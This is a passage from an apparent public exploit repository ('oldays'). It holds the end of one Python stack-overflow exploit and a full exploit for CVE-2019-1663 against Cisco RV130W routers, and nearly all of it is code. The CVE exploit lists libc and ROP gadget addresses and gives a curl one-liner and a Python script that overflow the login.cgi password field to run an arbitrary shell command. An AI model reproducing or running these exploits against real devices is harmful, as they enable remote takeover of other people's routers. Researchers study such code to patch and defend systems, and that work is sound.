| buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + 80 | "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + 81 | "http://" + rhost + ":" + rport + "\r\n\r\n" 82 | sock = socket(AF_INET, SOCK_STREAM) 83 | sock.settimeout(30) 84 | sock.connect((target_ip,int(target_port))) 85 | sock.send(buf) 86 | print ("done\n") 87 | 88 | if __name__ == "__main__": 89 | main() 90 | -------------------------------------------------------------------------------- /CVE-2019-1663.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Exploit Title: Cisco RV130W Remote Stack Overflow 3 | # Google Dork: n/a 4 | # Date: Advisory Published: Feb 2019 5 | # Exploit Author: @0x00string 6 | # Vendor Homepage: cisco.com 7 | # Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html 8 | # Version: 1.0.3.44 and prior 9 | # Tested on: 1.0.3.44 10 | # CVE : CVE-2019-1663 11 | # 12 | # 0x357fc000 - libc base addr 13 | # 0x35849144 - system() addr 14 | # 15 | # 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr; 16 | # 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; 17 | # 0x00041308 / 0x3583D308: mov r0, sp; blx r2; 18 | # 19 | # gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text 20 | # [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command] 21 | # 22 | # curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi' 23 | 24 | #!/usr/bin/python 25 | import requests 26 | 27 | def banner(): 28 | print ''' 29 | @0x00string 30 | 0000000000000 31 | 0000000000000000000 00 32 | 00000000000000000000000000000 33 | 0000000000000000000000000000000 34 | 000000000 0000000000 35 | 00000000 0000000000 36 | 0000000 000000000000 37 | 0000000 000000000000000 38 | 000000 000000000 000000 39 | 0000000 000000000 000000 40 | 000000 000000000 000000 41 | 000000 000000000 000000 42 | 000000 00000000 000000 43 | 000000 000000000 000000 44 | 0000000 000000000 0000000 45 | 000000 000000000 000000 46 | 0000000000000000 0000000 47 | 0000000000000 0000000 48 | 00000000000 00000000 49 | 00000000000 000000000 50 | 0000000000000000000000000000000 51 | 00000000000000000000000000000 52 | 000 0000000000000000000 53 | 0000000000000 54 | https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py 55 | ''' 56 | 57 | def main(): 58 | banner() 59 | command = "ping 192.168.1.100\x00" 60 | print ("Sending exploit to execute [" + command + "]\n") 61 | rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35" 62 | payload = ("Z" * 446) + rop + command 63 | url = "https://192.168.1.100:443/login.cgi" 64 | data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'} 65 | r = requests.post(url, payload=data) 66 | 67 | if __name__ == "__main__": 68 | main() 69 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | oldays 2 | ====== 3 | 4 | public exploits 5 | --------------------------------------------------------------------------------